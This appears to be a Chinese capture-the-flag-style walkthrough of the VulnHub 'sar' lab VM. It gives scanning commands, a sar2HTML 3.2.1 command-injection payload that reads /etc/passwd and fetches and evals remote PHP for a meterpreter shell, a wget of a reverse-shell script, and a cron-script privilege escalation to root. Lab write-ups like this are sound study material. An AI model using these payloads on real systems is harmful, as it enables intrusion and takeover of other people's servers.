vulnhub之sar的实践

今天实践的是vulnhub的sar镜像，

下载地址，https://download.vulnhub.com/sar/sar.zip，

用virtualbox导入成功，

做地址扫描，sudo netdiscover -r 192.168.0.0/24，

获取到靶机地址192.168.0.186，

继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.0.186，

有web服务，做一下目录暴破，dirb http://192.168.0.186，

浏览器访问http://192.168.0.186/robots.txt，

浏览器访问http://192.168.0.186/sar2HTML，

搜索sar2html Ver 3.2.1的漏洞利用方法，

验证一下，http://192.168.0.186/sar2HTML/index.php?plot=;tail "/etc/passwd"，

kali攻击机上构建攻击脚本，

use /exploit/multi/script/web_delivery

set target 1

set lhost 192.168.0.185

set payload php/meterpreter/reverse_tcp

exploit

浏览器访问http://192.168.0.186/sar2HTML/index.php?plot=;php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.185:8080/wpTl1KrB1sb', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"，

获取到shell，查看定时任务，cat /etc/crontab，

最后找到write.sh是root权限，而且当前用户可写，

kali攻击机上制作反弹shell脚本，

cp /usr/share/webshells/php/php-reverse-shell.php shell.php，

靶机上下载反弹shell脚本，

wget http://192.168.0.185:8000/shell.php，

向write.sh写入命令，echo "php ./shell.php" >> write.sh，

kali攻击机上开启反弹shell监听，nc -lvp 1234，

获取到反弹shell，id确认是root，